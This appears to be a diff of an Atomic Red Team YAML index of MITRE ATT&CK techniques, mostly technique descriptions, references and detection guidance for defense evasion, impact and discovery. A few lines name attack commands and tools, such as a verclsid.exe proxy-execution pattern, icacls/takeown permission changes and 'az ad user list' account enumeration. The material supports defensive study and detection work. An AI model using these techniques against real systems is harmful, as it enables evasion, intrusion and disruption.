_VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev) + id: attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-23T11:31:50.407Z' + created: '2020-09-17T12:51:40.845Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_system_requirements: + - MS Office version specified in _VBA_PROJECT stream must match + host + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit) + + If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020) + x_mitre_data_sources: + - Process monitoring + - File monitoring + x_mitre_contributors: + - Rick Cole, FireEye + x_mitre_platforms: + - Linux + - Windows + - macOS + atomic_tests: [] T1055.014: technique: id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5 @@ -36273,13 +40837,8 @@ defense-evasion: atomic_tests: [] T1078: technique: - id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Valid Accounts - description: |- - Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. - - The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1078 @@ -36295,8 +40854,13 @@ defense-evasion: description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. source_name: TechNet Audit Policy - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + description: |- + Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. + + The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) + name: Valid Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack @@ -36307,13 +40871,31 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-06-20T22:44:36.043Z' + modified: '2020-10-19T16:01:22.724Z' created: '2017-05-31T21:31:00.645Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Netskope - - Mark Wee - - Praetorian + x_mitre_version: '2.1' + x_mitre_data_sources: + - AWS CloudTrail logs + - Stackdriver logs + - Authentication logs + - Process monitoring + x_mitre_defense_bypassed: + - Firewall + - Host intrusion prevention systems + - Network intrusion detection system + - Application control + - System access controls + - Anti-virus + x_mitre_detection: |- + Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + + Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_effective_permissions: + - User + - Administrator x_mitre_platforms: - Linux - macOS @@ -36324,45 +40906,98 @@ defense-evasion: - SaaS - Office 365 - Azure AD - x_mitre_effective_permissions: - - User - - Administrator - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). - - Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. - x_mitre_defense_bypassed: - - Firewall - - Host intrusion prevention systems - - Network intrusion detection system - - Application control - - System access controls - - Anti-virus - x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring - x_mitre_version: '2.1' + x_mitre_contributors: + - Netskope + - Mark Wee + - Praetorian + x_mitre_is_subtechnique: false atomic_tests: [] - T1497: + T1218.012: technique: external_references: - source_name: mitre-attack - external_id: T1497 - url: https://attack.mitre.org/techniques/T1497 - - source_name: Unit 42 Pirpi July 2015 - url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/ - description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations - on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April - 23, 2019.' + external_id: T1218.012 + url: https://attack.mitre.org/techniques/T1218/012 + - source_name: WinOSBite verclsid.exe + url: https://www.winosbite.com/verclsid-exe/  + description: verclsid-exe. (2019, December 17). verclsid.exe File Information + - What is it & How to Block . Retrieved August 10, 2020. + - source_name: LOLBAS Verclsid + url: https://lolbas-project.github.io/lolbas/Binaries/Verclsid/ + description: LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020. + - source_name: Red Canary Verclsid.exe + url: https://redcanary.com/blog/verclsid-exe-threat-detection/ + description: 'Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy + a New Methodology: Verclsid.exe. Retrieved August 10, 2020.' + - source_name: BOHOPS Abusing the COM Registry + url: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ + description: 'BOHOPS. (2018, August 18). Abusing the COM Registry Structure + (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020.' + - source_name: Nick Tyrer GitHub + url: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 + description: Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Virtualization/Sandbox Evasion + name: Verclsid + description: "Adversaries may abuse verclsid.exe to proxy execution of malicious + code. Verclsid.exe is known as the Extension CLSID Verification Host and is + responsible for verifying each shell extension before they are used by Windows + Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\n\nAdversaries + may abuse verclsid.exe to execute malicious payloads. This may be achieved + by running verclsid.exe /S /C {CLSID}, where the file is referenced + by a Class ID (CLSID), a unique identification number used to identify COM + objects. COM payloads executed by verclsid.exe may be able to perform various + malicious actions, such as loading and executing COM scriptlets (SCT) from + remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). + Since it is signed and native on Windows systems, proxying execution via verclsid.exe + may bypass application control solutions that do not account for its potential + abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: + BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) " + id: attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-08-19T19:29:18.138Z' + created: '2020-08-10T13:59:38.443Z' + x_mitre_defense_bypassed: + - Application control + - Digital Certificate Validation + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: Use process monitoring to monitor the execution and arguments + of verclsid.exe. Compare recent invocations of verclsid.exe with prior history + of known good arguments and loaded files to determine anomalous and potentially + adversarial activity. Command arguments used before and after the invocation + of verclsid.exe may also be useful in determining the origin and purpose of + the payload being executed. Depending on the environment, it may be unusual + for verclsid.exe to have a parent process of a Microsoft Office product. It + may also be unusual for verclsid.exe to have any child processes or to make + network connections or file modifications. + x_mitre_data_sources: + - Process use of network + - Process command-line parameters + - Process monitoring + - File monitoring + x_mitre_contributors: + - Rodrigo Garcia, Red Canary + x_mitre_platforms: + - Windows + atomic_tests: [] + T1497: + technique: + created: '2019-04-17T22:22:24.505Z' + modified: '2020-07-01T16:32:02.272Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: discovery + type: attack-pattern + id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d description: "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine @@ -36379,16 +41014,35 @@ defense-evasion: if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n" - id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: discovery - modified: '2020-07-01T16:32:02.272Z' - created: '2019-04-17T22:22:24.505Z' - x_mitre_version: '1.2' + name: Virtualization/Sandbox Evasion + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1497 + url: https://attack.mitre.org/techniques/T1497 + - source_name: Unit 42 Pirpi July 2015 + url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/ + description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations + on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April + 23, 2019.' + x_mitre_is_subtechnique: false + x_mitre_defense_bypassed: + - Anti-virus + - Host forensic analysis + - Signature-based detection + - Static File Analysis + x_mitre_contributors: + - Deloitte Threat Library Team + - Sunny Neo + x_mitre_platforms: + - Windows + - macOS + - Linux + x_mitre_data_sources: + - Process monitoring + - Process command-line parameters x_mitre_detection: Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should @@ -36399,22 +41053,53 @@ defense-evasion: required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. + x_mitre_version: '1.2' + atomic_tests: [] + T1600: + technique: + id: attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8 + description: |- + Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution) + + Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key. + + Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks) + name: Weaken Encryption + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1600 + url: https://attack.mitre.org/techniques/T1600 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-10-21T22:37:49.258Z' + created: '2020-10-19T18:47:08.759Z' x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - File monitoring x_mitre_platforms: - - Windows - - macOS - - Linux - x_mitre_contributors: - - Deloitte Threat Library Team - - Sunny Neo + - Network + x_mitre_detection: There is no documented method for defenders to directly identify + behaviors that weaken encryption. Detection efforts may be focused on closely + related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). + Some detection methods require vendor support to aid in investigation. x_mitre_defense_bypassed: - - Anti-virus - - Host forensic analysis - - Signature-based detection - - Static File Analysis + - Encryption + x_mitre_permissions_required: + - Administrator x_mitre_is_subtechnique: false + x_mitre_version: '1.0' atomic_tests: [] T1550.004: technique: @@ -36422,6 +41107,9 @@ defense-evasion: - source_name: mitre-attack external_id: T1550.004 url: https://attack.mitre.org/techniques/T1550/004 + - external_id: CAPEC-60 + source_name: capec + url: https://capec.mitre.org/data/definitions/60.html - description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019. url: https://wunderwuzzi23.github.io/blog/passthecookie.html @@ -36447,9 +41135,9 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-24T12:36:24.501Z' + modified: '2020-09-16T19:40:44.527Z' created: '2020-01-30T17:48:49.395Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_defense_bypassed: - System Access Controls @@ -36500,15 +41188,15 @@ defense-evasion: Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018) - Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). + Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). id: attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-29T23:07:55.953Z' + modified: '2020-09-01T20:05:05.268Z' created: '2020-02-04T19:17:41.767Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User @@ -37312,13 +42000,13 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-27T21:09:28.699Z' + modified: '2020-10-14T14:52:11.708Z' created: '2019-03-15T13:59:30.390Z' x_mitre_is_subtechnique: false x_mitre_impact_type: - Availability x_mitre_detection: |- - Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories. + Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories. In some cases, monitoring for unusual kernel driver installation activity can aid in detection. x_mitre_data_sources: @@ -37432,6 +42120,12 @@ impact: - source_name: mitre-attack external_id: T1498.001 url: https://attack.mitre.org/techniques/T1498/001 + - external_id: CAPEC-125 + source_name: capec + url: https://capec.mitre.org/data/definitions/125.html + - external_id: CAPEC-486 + source_name: capec + url: https://capec.mitre.org/data/definitions/486.html - source_name: USNYAG IranianBotnet March 2016 url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged description: Preet Bharara, US Attorney. (2016, March 24). Retrieved April @@ -37453,7 +42147,7 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-29T01:10:52.360Z' + modified: '2020-09-16T15:57:12.410Z' created: '2020-03-02T20:07:18.651Z' x_mitre_data_sources: - Sensor health and status @@ -37473,7 +42167,7 @@ impact: time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability @@ -37754,7 +42448,7 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-29T02:07:27.676Z' + modified: '2020-09-16T15:56:03.459Z' created: '2019-04-18T11:00:55.862Z' x_mitre_is_subtechnique: false x_mitre_detection: |- @@ -38158,7 +42852,7 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-29T01:11:28.903Z' + modified: '2020-09-16T15:58:18.788Z' created: '2019-04-17T20:23:15.105Z' x_mitre_is_subtechnique: false x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before @@ -38199,6 +42893,12 @@ impact: - source_name: mitre-attack external_id: T1499.001 url: https://attack.mitre.org/techniques/T1499/001 + - external_id: CAPEC-469 + source_name: capec + url: https://capec.mitre.org/data/definitions/469.html + - external_id: CAPEC-482 + source_name: capec + url: https://capec.mitre.org/data/definitions/482.html - source_name: Arbor AnnualDoSreport Jan 2018 url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill @@ -38232,9 +42932,9 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-29T01:43:29.320Z' + modified: '2020-09-16T15:54:35.429Z' created: '2020-02-20T15:27:18.581Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability @@ -38262,6 +42962,9 @@ impact: - source_name: mitre-attack external_id: T1498.002 url: https://attack.mitre.org/techniques/T1498/002 + - external_id: CAPEC-490 + source_name: capec + url: https://capec.mitre.org/data/definitions/490.html - source_name: Cloudflare ReflectionDoS May 2017 url: https://blog.cloudflare.com/reflections-on-reflections/ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection @@ -38301,7 +43004,7 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-23T12:55:30.119Z' + modified: '2020-09-16T15:58:18.490Z' created: '2020-03-02T20:08:03.691Z' x_mitre_data_sources: - Sensor health and status @@ -38321,7 +43024,7 @@ impact: the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability @@ -38468,6 +43171,15 @@ impact: - source_name: mitre-attack external_id: T1499.002 url: https://attack.mitre.org/techniques/T1499/002 + - external_id: CAPEC-488 + source_name: capec + url: https://capec.mitre.org/data/definitions/488.html + - external_id: CAPEC-489 + source_name: capec + url: https://capec.mitre.org/data/definitions/489.html + - external_id: CAPEC-528 + source_name: capec + url: https://capec.mitre.org/data/definitions/528.html - source_name: Arbor AnnualDoSreport Jan 2018 url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill @@ -38501,9 +43213,9 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-29T01:52:53.947Z' + modified: '2020-09-16T15:56:03.131Z' created: '2020-02-20T15:31:43.613Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability @@ -38573,25 +43285,28 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-07-14T19:34:47.636Z' + modified: '2020-07-24T15:36:08.042Z' created: '2019-03-29T19:00:55.901Z' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows + - Linux + - macOS x_mitre_permissions_required: - Administrator - SYSTEM - User - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_detection: |- Monitor processes and command-line arguments to see if critical processes are terminated or stop running. - Monitor Registry edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\SYSTEM\CurrentControlSet\Services. + Monitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at HKLM\SYSTEM\CurrentControlSet\Services. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links. Alterations to the service binary path or the service startup type changed to disabled may be suspicious. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018) x_mitre_data_sources: + - File monitoring - Process command-line parameters - Process monitoring - Windows Registry @@ -38713,6 +43428,21 @@ impact: atomic_tests: [] T1529: technique: + created: '2019-10-04T20:42:28.541Z' + modified: '2020-03-27T21:18:48.149Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: impact + type: attack-pattern + id: attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc + description: |- + Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. + + Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) + name: System Shutdown/Reboot + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1529 @@ -38729,42 +43459,27 @@ impact: url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: System Shutdown/Reboot - description: |- - Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. - - Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) - id: attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: impact - modified: '2020-03-27T21:18:48.149Z' - created: '2019-10-04T20:42:28.541Z' - x_mitre_is_subtechnique: false - x_mitre_detection: Use process monitoring to monitor the execution and command - line parameters of binaries involved in shutting down or rebooting systems. - Windows event logs may also designate activity associated with a shutdown/reboot, - ex. Event ID 1074 and 6006. - x_mitre_version: '1.0' - x_mitre_impact_type: - - Availability + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - Windows event logs + - Process command-line parameters + - Process monitoring x_mitre_permissions_required: - User - Administrator - root - SYSTEM - x_mitre_data_sources: - - Windows event logs - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_impact_type: + - Availability + x_mitre_version: '1.0' + x_mitre_detection: Use process monitoring to monitor the execution and command + line parameters of binaries involved in shutting down or rebooting systems. + Windows event logs may also designate activity associated with a shutdown/reboot, + ex. Event ID 1074 and 6006. + x_mitre_is_subtechnique: false identifier: T1529 atomic_tests: - name: Shutdown System - Windows @@ -38972,13 +43687,16 @@ discovery: - source_name: mitre-attack external_id: T1087 url: https://attack.mitre.org/techniques/T1087 + - external_id: CAPEC-575 + source_name: capec + url: https://capec.mitre.org/data/definitions/575.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-26T15:27:59.127Z' + modified: '2020-09-16T15:10:18.260Z' created: '2017-05-31T21:31:06.988Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -39006,7 +43724,7 @@ discovery: x_mitre_contributors: - Microsoft Threat Intelligence Center (MSTIC) - Travis Smith, Tripwire - x_mitre_version: '2.1' + x_mitre_version: '2.2' atomic_tests: [] T1010: technique: @@ -39256,6 +43974,16 @@ discovery: Directory Leaks via Azure. Retrieved October 6, 2019. url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/ source_name: Black Hills Red Teaming MS AD Azure, 2018 + - source_name: AWS List Roles + description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020. + url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html + - source_name: AWS List Users + url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html + description: Amazon. (n.d.). List Users. Retrieved August 11, 2020. + - source_name: Google Cloud - IAM Servie Accounts List API + url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list + description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved + August 4, 2020. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -39263,22 +43991,32 @@ discovery: description: "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud - service provider of SaaS application.\n\nWith authenticated access there are + service provider or SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions - group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance)\n\nAzure - CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated - access to a domain. The command az ad user list will list all - users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red - Teaming MS AD Azure, 2018) " + group in 